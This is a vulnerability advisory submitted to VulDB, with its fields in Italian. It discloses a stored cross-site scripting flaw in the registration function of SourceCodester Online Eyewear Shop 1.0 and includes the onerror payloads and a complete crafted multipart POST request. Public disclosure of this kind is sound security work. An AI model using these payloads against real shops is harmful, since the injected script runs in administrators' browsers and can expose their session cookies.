| Titolo | SourceCodester Online Eyewear Shop 1.0 Cross-Site Scripting |
|---|
| Descrizione | The application Online Eyewear Shop 1.0 is vulnerable to Stored Cross-Site Scripting attacks.
The vulnerability is triggered by sending a specially crafted POST request as a customer user to the following URL:
- http://localhost/oews/classes/Users.php?f=registration
The vulnerable function corresponds to "registration" within the following source code file:
- oews/classes/Users.php
This function allows to register a new customer user or to edit an already existing one. The application does not correctly sanitize the input provided by the user and the XSS payload
"><img src=X onerror=prompt(document.cookie)>
could be uploaded within any of the following parameters:
- "firstname"
- "middlename"
- "lastname"
- "email"
- "contact"
Here an example of POST request:
'''
POST /oews/classes/Users.php?f=registration HTTP/1.1
Host: localhost
Content-Type: multipart/form-data; boundary=---------------------------110352294825610921354088773808
Content-Length: 1274
Connection: close
Cookie: PHPSESSID=lmpi80mm6i466es8arcrfj78vo
-----------------------------110352294825610921354088773808
Content-Disposition: form-data; name="id"
4
-----------------------------110352294825610921354088773808
Content-Disposition: form-data; name="firstname"
XSS"><img src=X onerror=prompt(1)>
-----------------------------110352294825610921354088773808
Content-Disposition: form-data; name="middlename"
"><img src=X onerror=prompt(2)>
-----------------------------110352294825610921354088773808
Content-Disposition: form-data; name="lastname"
TEST"><img src=X onerror=prompt(3)>
-----------------------------110352294825610921354088773808
Content-Disposition: form-data; name="gender"
Male
-----------------------------110352294825610921354088773808
Content-Disposition: form-data; name="email"
[email protected]"><img src=X onerror=prompt(5)>
-----------------------------110352294825610921354088773808
Content-Disposition: form-data; name="contact"
444"><img src=X onerror=prompt(6)>
-----------------------------110352294825610921354088773808
Content-Disposition: form-data; name="password"
-----------------------------110352294825610921354088773808
Content-Disposition: form-data; name="img"; filename=""
Content-Type: application/octet-stream
-----------------------------110352294825610921354088773808--
'''
This set of information is stored inside the database for the current user and the script is executed anytime the related fields are printed out on the website. For this reason, any administrator user could be a potential victim of this attack if she tries to edit that customer or by simply accessing to the "Customer List View". This view (located at the URL "http://localhost/oews/admin/?page=customers") shows the value of the following fields:
- First Name
- Middle Name
- Last Name
- Email |
|---|
| Utente | CP_offensive_team (UID 40465) |
|---|
| Sottomissione | 07/02/2023 18:07 (3 anni fa) |
|---|
| Moderazione | 07/02/2023 20:59 (3 hours later) |
|---|
| Stato | Accettato |
|---|
| Voce VulDB | 220369 [SourceCodester Online Eyewear Shop 1.0 POST Request oews/classes/Users.php registration firstname/middlename/lastname/email/contact cross site scripting] |
|---|
| Punti | 17 |
|---|